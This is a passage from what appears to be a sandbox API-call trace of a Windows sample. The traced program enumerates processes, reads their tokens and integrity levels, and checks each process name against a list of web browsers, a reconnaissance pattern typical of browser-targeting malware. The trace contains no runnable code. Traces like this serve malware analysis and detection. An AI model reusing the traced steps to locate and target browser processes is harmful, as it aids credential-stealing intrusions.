lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0228.885] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0228.885] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0228.885] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0228.885] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0228.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0228.885] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.885] GetLastError () returned 0x7a [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.885] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.885] CloseHandle (hObject=0x340) returned 1 [0228.885] CloseHandle (hObject=0x548) returned 1 [0228.885] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x548 [0228.886] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x347578, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.886] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.886] GetLastError () returned 0x7a [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.886] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.886] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.886] CloseHandle (hObject=0x340) returned 1 [0228.886] CloseHandle (hObject=0x548) returned 1 [0228.886] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0228.886] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0228.886] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0228.886] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0228.886] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0228.886] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0228.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x548 [0228.886] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.886] GetLastError () returned 0x7a [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.886] CloseHandle (hObject=0x340) returned 1 [0228.886] CloseHandle (hObject=0x548) returned 1 [0228.886] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.886] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.886] GetLastError () returned 0x7a [0228.886] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.886] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.886] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.886] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0228.887] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0228.887] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0228.887] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0228.887] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0228.887] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0228.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x548 [0228.887] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.887] GetLastError () returned 0x7a [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.887] CloseHandle (hObject=0x340) returned 1 [0228.887] CloseHandle (hObject=0x548) returned 1 [0228.887] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.887] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.887] GetLastError () returned 0x7a [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.887] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.887] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.887] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0228.887] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0228.887] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0228.887] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0228.887] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0228.887] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0228.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0x548 [0228.887] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.887] GetLastError () returned 0x7a [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.887] CloseHandle (hObject=0x340) returned 1 [0228.887] CloseHandle (hObject=0x548) returned 1 [0228.887] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.887] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.887] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.888] GetLastError () returned 0x7a [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.888] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.888] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.888] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0228.888] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0228.888] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0228.888] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0228.888] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0228.888] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0228.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0x548 [0228.888] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.888] GetLastError () returned 0x7a [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.888] CloseHandle (hObject=0x340) returned 1 [0228.888] CloseHandle (hObject=0x548) returned 1 [0228.888] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.888] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.888] GetLastError () returned 0x7a [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.888] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.888] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.888] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0228.888] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0228.888] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0228.888] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0228.888] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0228.888] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0228.888] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0x548 [0228.888] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.888] GetLastError () returned 0x7a [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.888] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.888] CloseHandle (hObject=0x340) returned 1 [0228.888] CloseHandle (hObject=0x548) returned 1 [0228.889] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.889] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.889] GetLastError () returned 0x7a [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.889] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.889] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.889] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0228.889] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0228.889] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0228.889] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0228.889] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0228.889] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0x548 [0228.889] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.889] GetLastError () returned 0x7a [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.889] CloseHandle (hObject=0x340) returned 1 [0228.889] CloseHandle (hObject=0x548) returned 1 [0228.889] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.889] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.889] GetLastError () returned 0x7a [0228.889] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.889] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.889] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.889] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0228.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0228.890] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5fc) returned 0x548 [0228.890] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.890] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.890] GetLastError () returned 0x7a [0228.890] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.890] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.890] CloseHandle (hObject=0x340) returned 1 [0228.890] CloseHandle (hObject=0x548) returned 1 [0228.890] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.890] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.890] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.890] GetLastError () returned 0x7a [0228.890] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.890] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.890] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.890] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0228.890] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0228.890] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0228.890] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0228.890] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0228.890] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0228.890] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0228.890] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0230.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0a0) returned 0xc0000004 [0230.913] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0230.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0230.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0230.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0230.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0230.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0230.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0230.916] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0230.916] OpenProcess 